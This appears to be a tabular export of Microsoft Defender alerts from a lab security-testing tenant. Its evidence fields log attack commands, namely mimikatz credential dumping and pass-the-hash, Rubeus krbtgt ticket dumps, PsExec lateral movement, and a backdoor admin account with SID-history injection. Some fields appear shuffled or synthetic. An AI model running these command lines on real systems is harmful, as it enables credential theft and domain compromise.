alertId
stringclasses
278 values
providerAlertId
stringclasses
278 values
incidentId
int64
486
989
serviceSource
stringclasses
2 values
creationTime
stringdate
2022-09-30 05:04:51
2023-01-24 06:03:50
lastUpdatedTime
stringdate
2022-11-12 01:35:42
2023-01-24 06:05:47
resolvedTime
stringclasses
23 values
firstActivity
stringdate
2022-09-07 09:25:00
2023-01-24 05:31:07
lastActivity
stringdate
2022-09-30 05:00:00
2023-01-24 05:43:53
title
stringclasses
62 values
description
stringclasses
51 values
category
stringclasses
12 values
status
stringclasses
2 values
severity
stringclasses
4 values
investigationId
int64
20
64
investigationState
stringclasses
9 values
classification
stringclasses
1 value
determination
stringclasses
1 value
detectionSource
stringclasses
7 values
detectorId
stringclasses
48 values
assignedTo
stringclasses
3 values
actorName
stringclasses
1 value
threatFamilyName
stringclasses
6 values
mitreTechniques
listlengths
0
8
devices
listlengths
1
6
entities
listlengths
0
49
entityType
stringclasses
2 values
evidenceCreationTime
stringclasses
469 values
verdict
stringclasses
5 values
remediationStatus
stringclasses
2 values
accountName
stringclasses
30 values
domainName
stringclasses
17 values
userSid
stringclasses
22 values
aadUserId
stringclasses
8 values
userPrincipalName
stringclasses
14 values
sha1
stringclasses
28 values
sha256
stringclasses
27 values
fileName
stringclasses
21 values
filePath
stringclasses
13 values
processId
int64
0
20.7k
processCommandLine
stringclasses
67 values
processCreationTime
stringclasses
133 values
parentProcessId
int64
0
14.6k
parentProcessCreationTime
stringclasses
63 values
parentProcessFileName
stringclasses
14 values
parentProcessFilePath
stringclasses
11 values
detectionStatus
stringclasses
1 value
deviceId
stringclasses
9 values
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
User
2022-12-14T15:03:59.3666667Z
Suspicious
None
darol
staging.net
S-1-5-21-2300221942-1987151257-321556088-1110
598763ac-48bb-4671-9472-6be219756e33
darol@msdxv2.m365dpoc.com
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
Process
2022-11-16T09:09:13.3533333Z
Suspicious
None
guest
NT AUTHORITY
S-1-5-18
null
null
044a0cf1f6bc478a7172bf207eef1e201a18ba02
ba4038fd20e474c047be8aad5bfacdb1bfc1ddbe12f803f473b7918d8d819436
powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0
3,764
powershell.exe -ExecutionPolicy AllSigned -NoProfile -NonInteractive -Command "& {$OutputEncoding = [Console]::OutputEncoding =[System.Text.Encoding]::UTF8;$scriptFileStream = [System.IO.File]::Open('C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\SenseCM\AntiVirus.psm1', [System.IO.FileMode]::Open, [System.IO.FileAccess]::Read, [System.IO.FileShare]::Read);$calculatedHash = Get-FileHash 'C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\SenseCM\AntiVirus.psm1' -Algorithm SHA256;if (!($calculatedHash.Hash -eq '1c0f9c9177787b3146332dd0f112444d3062214f6e71e1a4bc16b1fb55818a86')) { exit 323;};$scriptFileStream = [System.IO.File]::Open('C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\SenseCM\EDR.psm1', [System.IO.FileMode]::Open, [System.IO.FileAccess]::Read, [System.IO.FileShare]::Read);$calculatedHash = Get-FileHash 'C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\SenseCM\EDR.psm1' -Algorithm SHA256;if (!($calculatedHash.Hash -eq 'f84b9499bd9dc40b993886d328828a2ed82541e54b76f9cb9e04c007eb97d8be')) { exit 323;};$scriptFileStream = [System.IO.File]::Open('C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\SenseCM\Firewall.psm1', [System.IO.FileMode]::Open, [System.IO.FileAccess]::Read, [System.IO.FileShare]::Read);$calculatedHash = Get-FileHash 'C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\SenseCM\Firewall.psm1' -Algorithm SHA256;if (!($calculatedHash.Hash -eq '2490d8e22c01e09f99c8e32a044d6c150e75e8e75028809f73fffd9d3bf4ed92')) { exit 323;};$scriptFileStream = [System.IO.File]::Open('C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\SenseCM\GroupPolicyObject.psm1', [System.IO.FileMode]::Open, [System.IO.FileAccess]::Read, [System.IO.FileShare]::Read);$calculatedHash = Get-FileHash 'C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\SenseCM\GroupPolicyObject.psm1' -Algorithm SHA256;if (!($calculatedHash.Hash -eq '5b251a22c68070bcb6be4c85e71232067581fa1483ce767e2e9fbe98a4db0229')) { exit 323;};$scriptFileStream = [System.IO.File]::Open('C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\SenseCM\PolicyEnforcer.ps1', [System.IO.FileMode]::Open, [System.IO.FileAccess]::Read, [System.IO.FileShare]::Read);$calculatedHash = Get-FileHash 'C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\SenseCM\PolicyEnforcer.ps1' -Algorithm SHA256;if (!($calculatedHash.Hash -eq '13ff49e1e4a5017ae784cbe39648f9f18af975c2ce9616d52d7d7b32bec05e50')) { exit 323;}; . 'C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\SenseCM\PolicyEnforcer.ps1' }"
2022-11-16T09:06:26.1426374Z
1,748
2022-11-16T09:06:24.6563216Z
SenseCM.exe
C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\Platform\10.8210.22621.1011
Detected
7114973b832b32d349815a5d2811738cc10fa650
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
Process
2022-11-18T05:12:05.5433333Z
Suspicious
Active
alice
MSDXV2
S-1-5-21-2300221942-1987151257-321556088-1111
89b6fc86-af84-47b2-a72d-325362598b2c
ronhd@msdxv2.m365dpoc.com
fc870d086c53ded2e94300f7569aa9478186f2c7
a1fddd460edd35ed449d32cc43bc15675c48a314a6fa5fb158e3bc4fea460be1
Rubeus.exe
C:\Temp
6,712
Rubeus.exe dump /service:krbtgt /user:steve
2022-11-18T05:10:14.9715084Z
8,784
2022-11-18T05:10:14.9168031Z
cmd.exe
C:\Windows\System32
Detected
36150b3c1b69b5c2da9df4efd86ac6c166924a48
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
User
2022-11-21T02:04:36.8866667Z
Suspicious
None
bob
MSDXV2
S-1-5-21-2300221942-1987151257-321556088-1111
89b6fc86-af84-47b2-a72d-325362598b2c
ronhd@msdxv2.m365dpoc.com
null
null
null
null
null
null
null
null
null
null
null
null
null
da638045938683943421_1830318078
da638045938683943421_1830318078
765
MicrosoftDefenderForEndpoint
2022-11-21T02:17:48.3944641Z
2022-11-21T02:19:23.2233333Z
null
2022-11-21T02:01:39.5403186Z
2022-11-21T02:05:26.7380973Z
Command line used for possible overpass-the-hash
A suspicious command line might have been used to perform an overpass-the-hash attack. This attack typically involves obtaining a password hash from memory and then using the ticket to authenticate.
LateralMovement
New
Medium
null
UnsupportedAlertType
null
null
MTP
79ae2f5c-7394-4224-bae2-18fa2c975eec
null
null
null
[ "T1550.002", "T1550.003" ]
[ { "aadDeviceId": null, "defenderAvStatus": "Updated", "deviceDnsName": "prod.env", "firstSeen": "2022-08-08T08:51:02.455Z", "healthStatus": "Active", "loggedOnUsers": [ { "accountName": "jeff", "domainName": "MSDXV2" } ], "mdatpDeviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145", "onboardingStatus": "Onboarded", "osBuild": 17763, "osPlatform": "Windows10", "osProcessor": "x64", "rbacGroupName": "Full Auto Clients", "riskScore": "High", "tags": [ "Full auto" ], "version": "1809", "vmMetadata": { "cloudProvider": "Unknown", "resourceId": "/subscriptions/29e73d07-8740-4164-a257-592a19a7b77c/resourceGroups/MSDXV2/providers/Microsoft.Compute/virtualMachines/MSDXV2-Win10V", "subscriptionId": "29e73d07-8740-4164-a257-592a19a7b77c", "vmId": "17881b39-b03f-4a2c-9b56-078be1330bd0" } } ]
[ { "aadUserId": null, "accountName": "jeff", "detectionStatus": null, "deviceId": null, "domainName": null, "entityType": "Process", "evidenceCreationTime": "2022-11-21T02:17:48.44Z", "fileName": "mimikatz.exe", "filePath": "", "ipAddress": null, "parentProcessCreationTime": "2022-11-21T02:01:28.4753286Z", "parentProcessFileName": null, "parentProcessFilePath": null, "parentProcessId": 11068, "processCommandLine": "\"mimikatz.exe\" privilege::debug \"sekurlsa::pth /user:ronhd /ntlm:96def1a633fc6790124d5f8fe21cc72b /domain:msdxv2.m365dpoc.com /run:\\\"powershell.exe dir \\\\msdxv2-win10b\\C$ >> C:\\M365DAttack\\Step3-PasstheHash.txt\\\"\" exit", "processCreationTime": "2022-11-21T02:05:25.5028748Z", "processId": 6412, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "None", "remediationStatusDetails": null, "sha1": "70df765f554ed7392200422c18776b8992c09231", "sha256": "912018ab3c6b16b39ee84f17745ff0c80a33cee241013ec35d0281e40c0658d9", "url": null, "userPrincipalName": null, "userSid": "S-1-5-21-2300221942-1987151257-321556088-1104", "verdict": "Suspicious" }, { "aadUserId": null, "accountName": "jeff", "detectionStatus": null, "deviceId": null, "domainName": null, "entityType": "Process", "evidenceCreationTime": "2022-11-21T02:17:48.44Z", "fileName": "powershell.exe", "filePath": "", "ipAddress": null, "parentProcessCreationTime": null, "parentProcessFileName": null, "parentProcessFilePath": null, "parentProcessId": null, "processCommandLine": "powershell.exe dir \\\\msdxv2-win10b\\C$ >> C:\\M365DAttack\\Step3-PasstheHash.txt", "processCreationTime": "2022-11-21T02:05:25.6506882Z", "processId": 4264, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "None", "remediationStatusDetails": null, "sha1": "6cbce4a295c163791b60fc23d285e6d84f28ee4c", "sha256": "de96a6e69944335375dc1ac238336066889d9ffc7d73628ef4fe1b1b160ab32c", "url": null, "userPrincipalName": null, "userSid": "S-1-5-21-2300221942-1987151257-321556088-1104", "verdict": "Suspicious" }, { "aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4", "accountName": "jeff", "detectionStatus": null, "deviceId": null, "domainName": "msdxv2.m365dpoc", "entityType": "User", "evidenceCreationTime": "2022-11-21T02:17:48.44Z", "fileName": null, "filePath": null, "ipAddress": null, "parentProcessCreationTime": null, "parentProcessFileName": null, "parentProcessFilePath": null, "parentProcessId": null, "processCommandLine": null, "processCreationTime": null, "processId": null, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "None", "remediationStatusDetails": null, "sha1": null, "sha256": null, "url": null, "userPrincipalName": "jeff@msdxv2.m365dpoc.com", "userSid": "S-1-5-21-2300221942-1987151257-321556088-1104", "verdict": "Suspicious" }, { "aadUserId": null, "accountName": "jeff", "detectionStatus": null, "deviceId": null, "domainName": null, "entityType": "Process", "evidenceCreationTime": "2022-11-21T02:17:48.55Z", "fileName": "powershell.exe", "filePath": "", "ipAddress": null, "parentProcessCreationTime": "2022-11-10T07:06:11.4925045Z", "parentProcessFileName": null, "parentProcessFilePath": null, "parentProcessId": 372, "processCommandLine": "\"powershell.exe\" -noexit -command Set-Location -literalPath 'C:\\Users\\jeff\\Downloads'", "processCreationTime": "2022-11-21T02:01:28.4753286Z", "processId": 11068, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "None", "remediationStatusDetails": null, "sha1": "6cbce4a295c163791b60fc23d285e6d84f28ee4c", "sha256": "de96a6e69944335375dc1ac238336066889d9ffc7d73628ef4fe1b1b160ab32c", "url": null, "userPrincipalName": null, "userSid": "S-1-5-21-2300221942-1987151257-321556088-1104", "verdict": "Suspicious" }, { "aadUserId": null, "accountName": "jeff", "detectionStatus": null, "deviceId": null, "domainName": null, "entityType": "Process", "evidenceCreationTime": "2022-11-21T02:17:48.6266667Z", "fileName": "mimikatz.exe", "filePath": "", "ipAddress": null, "parentProcessCreationTime": null, "parentProcessFileName": null, "parentProcessFilePath": null, "parentProcessId": null, "processCommandLine": "\"mimikatz.exe\" privilege::debug sekurlsa::logonpasswords exit", "processCreationTime": "2022-11-21T02:05:25.1740087Z", "processId": 772, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "None", "remediationStatusDetails": null, "sha1": "70df765f554ed7392200422c18776b8992c09231", "sha256": "912018ab3c6b16b39ee84f17745ff0c80a33cee241013ec35d0281e40c0658d9", "url": null, "userPrincipalName": null, "userSid": "S-1-5-21-2300221942-1987151257-321556088-1104", "verdict": "Suspicious" }, { "aadUserId": null, "accountName": "jeff", "detectionStatus": null, "deviceId": null, "domainName": null, "entityType": "Process", "evidenceCreationTime": "2022-11-21T02:17:48.6966667Z", "fileName": "powershell.exe", "filePath": "", "ipAddress": null, "parentProcessCreationTime": "2022-11-10T07:06:11.4925045Z", "parentProcessFileName": null, "parentProcessFilePath": null, "parentProcessId": 372, "processCommandLine": "powershell.exe C:\\M365DAttack\\Get-KRBTicket.ps1", "processCreationTime": "2022-11-21T02:01:44.3957302Z", "processId": 11616, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "None", "remediationStatusDetails": null, "sha1": "6cbce4a295c163791b60fc23d285e6d84f28ee4c", "sha256": "de96a6e69944335375dc1ac238336066889d9ffc7d73628ef4fe1b1b160ab32c", "url": null, "userPrincipalName": null, "userSid": "S-1-5-21-2300221942-1987151257-321556088-1104", "verdict": "Suspicious" }, { "aadUserId": null, "accountName": "jeff", "detectionStatus": null, "deviceId": null, "domainName": null, "entityType": "Process", "evidenceCreationTime": "2022-11-21T02:17:48.6966667Z", "fileName": "xcopy.exe", "filePath": "", "ipAddress": null, "parentProcessCreationTime": null, "parentProcessFileName": null, "parentProcessFilePath": null, "parentProcessId": null, "processCommandLine": "\"xcopy.exe\" \\\\msdxv2-win10b\\C$\\Temp\\AdminTicket.txt C:\\M365DAttack\\Admin-Tickets", "processCreationTime": "2022-11-21T02:02:28.1136285Z", "processId": 10944, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "None", "remediationStatusDetails": null, "sha1": "a2d8e1a994cb7d774da09896cbb275238268b085", "sha256": "1c58e29c25b4065893dd4fbb6ed27bd8a04828a30396d581d7c641d21e910dc8", "url": null, "userPrincipalName": null, "userSid": "S-1-5-21-2300221942-1987151257-321556088-1104", "verdict": "Suspicious" }, { "aadUserId": null, "accountName": "jeff", "detectionStatus": null, "deviceId": null, "domainName": null, "entityType": "Process", "evidenceCreationTime": "2022-11-21T02:17:48.7733333Z", "fileName": "PsExec.exe", "filePath": "", "ipAddress": null, "parentProcessCreationTime": null, "parentProcessFileName": null, "parentProcessFilePath": null, "parentProcessId": null, "processCommandLine": "\"PsExec.exe\" \\\\msdxv2-win10b -accepteula cmd /c \"C:\\Temp\\Rubeus.exe dump /service:krbtgt /user:steve > C:\\Temp\\AdminTicket.txt\"", "processCreationTime": "2022-11-21T02:02:06.6655672Z", "processId": 10844, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "None", "remediationStatusDetails": null, "sha1": "b97761358338e640a31eef5e5c5773b633890914", "sha256": "57492d33b7c0755bb411b22d2dfdfdf088cbbfcd010e30dd8d425d5fe66adff4", "url": null, "userPrincipalName": null, "userSid": "S-1-5-21-2300221942-1987151257-321556088-1104", "verdict": "Suspicious" }, { "aadUserId": null, "accountName": "jeff", "detectionStatus": null, "deviceId": null, "domainName": null, "entityType": "Process", "evidenceCreationTime": "2022-11-21T02:17:48.9366667Z", "fileName": "PsExec.exe", "filePath": "", "ipAddress": null, "parentProcessCreationTime": null, "parentProcessFileName": null, "parentProcessFilePath": null, "parentProcessId": null, "processCommandLine": "\"PsExec.exe\" \\\\msdxv2-dc -accepteula cmd /c \"net.exe user /add BDAdmin Password1! && net.exe stop ntds /y && powershell.exe -Command \"Add-ADDBSidHistory -SamAccountName BDAdmin -SidHistory \\\"S-1-5-32-544\\\" -DatabasePath (Get-ItemProperty -Path Registry::HKLM\\SYSTEM\\CurrentControlSet\\Services\\NTDS\\Parameters).\\\"DSA Database file\\\"\" && net.exe start ntds\"", "processCreationTime": "2022-11-21T02:02:27.6005533Z", "processId": 9792, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "None", "remediationStatusDetails": null, "sha1": "b97761358338e640a31eef5e5c5773b633890914", "sha256": "57492d33b7c0755bb411b22d2dfdfdf088cbbfcd010e30dd8d425d5fe66adff4", "url": null, "userPrincipalName": null, "userSid": "S-1-5-21-2300221942-1987151257-321556088-1104", "verdict": "Suspicious" }, { "aadUserId": null, "accountName": "jeff", "detectionStatus": null, "deviceId": null, "domainName": null, "entityType": "Process", "evidenceCreationTime": "2022-11-21T02:17:48.9933333Z", "fileName": "xcopy.exe", "filePath": "", "ipAddress": null, "parentProcessCreationTime": null, "parentProcessFileName": null, "parentProcessFilePath": null, "parentProcessId": null, "processCommandLine": "\"xcopy.exe\" C:\\M365DAttack\\Rubeus\\Rubeus.exe \\\\msdxv2-win10b\\C$\\Temp", "processCreationTime": "2022-11-21T02:01:44.9851491Z", "processId": 10640, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "None", "remediationStatusDetails": null, "sha1": "a2d8e1a994cb7d774da09896cbb275238268b085", "sha256": "1c58e29c25b4065893dd4fbb6ed27bd8a04828a30396d581d7c641d21e910dc8", "url": null, "userPrincipalName": null, "userSid": "S-1-5-21-2300221942-1987151257-321556088-1104", "verdict": "Suspicious" }, { "aadUserId": null, "accountName": "jeff", "detectionStatus": null, "deviceId": null, "domainName": null, "entityType": "Process", "evidenceCreationTime": "2022-11-21T02:17:49.0666667Z", "fileName": "PsExec.exe", "filePath": "", "ipAddress": null, "parentProcessCreationTime": null, "parentProcessFileName": null, "parentProcessFilePath": null, "parentProcessId": null, "processCommandLine": "\"PsExec.exe\" \\\\msdxv2-win10b -accepteula cmd /c \"dir \\\\msdxv2-dc\\\\c$\"", "processCreationTime": "2022-11-21T02:01:45.0913234Z", "processId": 11072, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "None", "remediationStatusDetails": null, "sha1": "b97761358338e640a31eef5e5c5773b633890914", "sha256": "57492d33b7c0755bb411b22d2dfdfdf088cbbfcd010e30dd8d425d5fe66adff4", "url": null, "userPrincipalName": null, "userSid": "S-1-5-21-2300221942-1987151257-321556088-1104", "verdict": "Suspicious" }, { "aadUserId": null, "accountName": "jeff", "detectionStatus": null, "deviceId": null, "domainName": null, "entityType": "Process", "evidenceCreationTime": "2022-11-21T02:17:49.1266667Z", "fileName": "mimikatz.exe", "filePath": "", "ipAddress": null, "parentProcessCreationTime": "2022-11-21T02:01:28.4753286Z", "parentProcessFileName": null, "parentProcessFilePath": null, "parentProcessId": 11068, "processCommandLine": "\"mimikatz.exe\" privilege::debug \"sekurlsa::pth /user:ronhd /ntlm:96def1a633fc6790124d5f8fe21cc72b /domain:msdxv2.m365dpoc.com /run:\\\"powershell.exe dir \\\\msdxv2-win10b\\C$ >> C:\\M365DAttack\\Step3-PasstheHash.txt\\\"\" exit", "processCreationTime": "2022-11-21T02:01:38.4465922Z", "processId": 3516, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "None", "remediationStatusDetails": null, "sha1": "70df765f554ed7392200422c18776b8992c09231", "sha256": "912018ab3c6b16b39ee84f17745ff0c80a33cee241013ec35d0281e40c0658d9", "url": null, "userPrincipalName": null, "userSid": "S-1-5-21-2300221942-1987151257-321556088-1104", "verdict": "Suspicious" }, { "aadUserId": null, "accountName": "jeff", "detectionStatus": null, "deviceId": null, "domainName": null, "entityType": "Process", "evidenceCreationTime": "2022-11-21T02:17:49.1266667Z", "fileName": "powershell.exe", "filePath": "", "ipAddress": null, "parentProcessCreationTime": null, "parentProcessFileName": null, "parentProcessFilePath": null, "parentProcessId": null, "processCommandLine": "powershell.exe dir \\\\msdxv2-win10b\\C$ >> C:\\M365DAttack\\Step3-PasstheHash.txt", "processCreationTime": "2022-11-21T02:01:38.5793699Z", "processId": 8160, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "None", "remediationStatusDetails": null, "sha1": "6cbce4a295c163791b60fc23d285e6d84f28ee4c", "sha256": "de96a6e69944335375dc1ac238336066889d9ffc7d73628ef4fe1b1b160ab32c", "url": null, "userPrincipalName": null, "userSid": "S-1-5-21-2300221942-1987151257-321556088-1104", "verdict": "Suspicious" }, { "aadUserId": null, "accountName": "jeff", "detectionStatus": null, "deviceId": null, "domainName": null, "entityType": "Process", "evidenceCreationTime": "2022-11-21T02:17:49.5566667Z", "fileName": "mimikatz.exe", "filePath": "", "ipAddress": null, "parentProcessCreationTime": null, "parentProcessFileName": null, "parentProcessFilePath": null, "parentProcessId": null, "processCommandLine": "\"mimikatz.exe\" privilege::debug sekurlsa::logonpasswords exit", "processCreationTime": "2022-11-21T02:01:38.0862456Z", "processId": 10732, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "None", "remediationStatusDetails": null, "sha1": "70df765f554ed7392200422c18776b8992c09231", "sha256": "912018ab3c6b16b39ee84f17745ff0c80a33cee241013ec35d0281e40c0658d9", "url": null, "userPrincipalName": null, "userSid": "S-1-5-21-2300221942-1987151257-321556088-1104", "verdict": "Suspicious" }, { "aadUserId": null, "accountName": "jeff", "detectionStatus": null, "deviceId": null, "domainName": null, "entityType": "Process", "evidenceCreationTime": "2022-11-21T02:17:51.1433333Z", "fileName": "mimikatz.exe", "filePath": "", "ipAddress": null, "parentProcessCreationTime": null, "parentProcessFileName": null, "parentProcessFilePath": null, "parentProcessId": null, "processCommandLine": "\"mimikatz.exe\" privilege::debug \"sekurlsa::pth /user:ronhd /ntlm:96def1a633fc6790124d5f8fe21cc72b /domain:msdxv2.m365dpoc.com /run:\\\"powershell.exe C:\\M365DAttack\\Get-KRBTicket.ps1\\\"\" exit -Wait", "processCreationTime": "2022-11-21T02:01:44.2419747Z", "processId": 7452, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "None", "remediationStatusDetails": null, "sha1": "70df765f554ed7392200422c18776b8992c09231", "sha256": "912018ab3c6b16b39ee84f17745ff0c80a33cee241013ec35d0281e40c0658d9", "url": null, "userPrincipalName": null, "userSid": "S-1-5-21-2300221942-1987151257-321556088-1104", "verdict": "Suspicious" } ]
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
aa1b3903fe-9b87-443a-b14e-0a7c0cc86469
1b3903fe-9b87-443a-b14e-0a7c0cc86469
486
MicrosoftDefenderForIdentity
2022-09-30T06:14:33.3286247Z
2022-11-19T01:35:42.7033333Z
2022-10-01T01:36:00.5066667Z
2022-09-30T06:11:53.743663Z
2022-09-30T06:12:00.11693Z
Suspected overpass-the-hash attack (Kerberos)
Ron Henderson (Helpdesk Administrator) on MSDXV2-Win10V successfully authenticated against MSDXV2-DC.
DefenseEvasion
Resolved
High
null
UnsupportedAlertType
TruePositive
SecurityTesting
AzureATP
AbnormalKerberosOverpassTheHashSecurityAlert
msftadmin@msdxv2.m365dpoc.com
null
null
[ "T1550", "T1550.002" ]
[ { "aadDeviceId": null, "defenderAvStatus": "NotSupported", "deviceDnsName": "lab.net", "firstSeen": "2022-08-08T08:27:58.906Z", "healthStatus": "Active", "loggedOnUsers": [], "mdatpDeviceId": "e138ecd8e7b21eaf952cb35d56349bf50c64ac96", "onboardingStatus": "Onboarded", "osBuild": 17763, "osPlatform": "WindowsServer2019", "osProcessor": "x64", "rbacGroupName": "UnassignedGroup", "riskScore": "High", "tags": [], "version": "1809", "vmMetadata": { "cloudProvider": "Unknown", "resourceId": "/subscriptions/29e73d07-8740-4164-a257-592a19a7b77c/resourceGroups/MSDXV2/providers/Microsoft.Compute/virtualMachines/MSDXV2-DC", "subscriptionId": "29e73d07-8740-4164-a257-592a19a7b77c", "vmId": "5bc68ee9-2aaf-4b12-8045-60af8aecad6e" } }, { "aadDeviceId": null, "defenderAvStatus": "Updated", "deviceDnsName": "lab.net", "firstSeen": "2022-08-08T08:51:02.455Z", "healthStatus": "Active", "loggedOnUsers": [], "mdatpDeviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145", "onboardingStatus": "Onboarded", "osBuild": 17763, "osPlatform": "Windows10", "osProcessor": "x64", "rbacGroupName": "Full Auto Clients", "riskScore": "High", "tags": [ "Full auto" ], "version": "1809", "vmMetadata": { "cloudProvider": "Unknown", "resourceId": "/subscriptions/29e73d07-8740-4164-a257-592a19a7b77c/resourceGroups/MSDXV2/providers/Microsoft.Compute/virtualMachines/MSDXV2-Win10V", "subscriptionId": "29e73d07-8740-4164-a257-592a19a7b77c", "vmId": "17881b39-b03f-4a2c-9b56-078be1330bd0" } } ]
[ { "aadUserId": "89b6fc86-af84-47b2-a72d-325362598b2c", "accountName": "ronhd", "detectionStatus": null, "deviceId": null, "domainName": "msdxv2.m365dpoc", "entityType": "User", "evidenceCreationTime": "2022-09-30T06:14:33.3733333Z", "fileName": null, "filePath": null, "ipAddress": null, "parentProcessCreationTime": null, "parentProcessFileName": null, "parentProcessFilePath": null, "parentProcessId": null, "processCommandLine": null, "processCreationTime": null, "processId": null, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "None", "remediationStatusDetails": null, "sha1": null, "sha256": null, "url": null, "userPrincipalName": "ronhd@msdxv2.m365dpoc.com", "userSid": "S-1-5-21-2300221942-1987151257-321556088-1111", "verdict": "Suspicious" } ]
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
User
2022-12-13T20:43:38.7033333Z
Suspicious
None
bob
msdxv2.m365dpoc
S-1-5-21-2300221942-1987151257-321556088-1110
598763ac-48bb-4671-9472-6be219756e33
darol@msdxv2.m365dpoc.com
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
User
2022-12-22T08:51:01.6233333Z
Suspicious
None
jeff
internal.corp
S-1-5-21-2159906967-4174806019-1002223092-1104
null
jeff@msdxv8.m365dpoc.com
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
User
2022-11-11T08:20:15.35Z
Suspicious
None
jeff
test.domain
S-1-5-21-2300221942-1987151257-321556088-1104
e848b07a-87af-4448-9979-09f0b809c8d4
jeff@msdxv2.m365dpoc.com
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
User
2022-11-21T02:14:25.5266667Z
Suspicious
None
root
msdxv2.m365dpoc
S-1-5-21-2300221942-1987151257-321556088-1104
e848b07a-87af-4448-9979-09f0b809c8d4
jeff@msdxv2.m365dpoc.com
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
Process
2022-11-11T08:19:56.9633333Z
Suspicious
None
SYSTEM
NT AUTHORITY
S-1-5-18
null
null
f309b61a8b005b5ce0a3fb58caaa798cfc95f5db
3c19fee379b4882971834a3d38f3f8b86de560114274375560433778cd505748
PSEXESVC.exe
C:\Windows
268
PSEXESVC.exe
2022-11-11T08:17:57.8297749Z
680
2022-11-10T17:17:06.0160973Z
services.exe
C:\Windows\System32
Detected
e138ecd8e7b21eaf952cb35d56349bf50c64ac96
da638001153615003333_1678515249
76ffd1e5-45b0-458e-9255-d679c5aa1ddf
486
MicrosoftDefenderForEndpoint
2022-09-30T06:16:01.5003536Z
2022-11-19T01:35:42.7033333Z
2022-10-01T01:36:00.5066667Z
2022-09-30T06:12:00.8318757Z
2022-09-30T06:13:04.3376842Z
File dropped and launched from remote location
A remote session dropped a file and executed it. An attacker or a malware might be an attempting move laterally or propagate.
LateralMovement
Resolved
Medium
22
TerminatedBySystem
TruePositive
SecurityTesting
WindowsDefenderAtp
17d50613-c135-4981-858e-86cdecb4e46e
msftadmin@msdxv2.m365dpoc.com
null
null
[ "T1021.002", "T1105", "T1570" ]
[ { "aadDeviceId": "14b11ffe-5128-4842-bbdf-31f0fbfcb600", "defenderAvStatus": "Updated", "deviceDnsName": "evilcorp.cn", "firstSeen": "2022-08-08T08:29:47.252Z", "healthStatus": "Active", "loggedOnUsers": [ { "accountName": "steve", "domainName": "MSDXV2" } ], "mdatpDeviceId": "36150b3c1b69b5c2da9df4efd86ac6c166924a48", "onboardingStatus": "Onboarded", "osBuild": 19043, "osPlatform": "Windows10", "osProcessor": "x64", "rbacGroupName": "Semi Auto Client", "riskScore": "High", "tags": [ "semi auto" ], "version": "21H1", "vmMetadata": { "cloudProvider": "Unknown", "resourceId": "/subscriptions/29e73d07-8740-4164-a257-592a19a7b77c/resourceGroups/MSDXV2/providers/Microsoft.Compute/virtualMachines/MSDXV2-Win10B", "subscriptionId": "29e73d07-8740-4164-a257-592a19a7b77c", "vmId": "2f7d6bc4-df6d-4836-becd-aff9cb361b66" } } ]
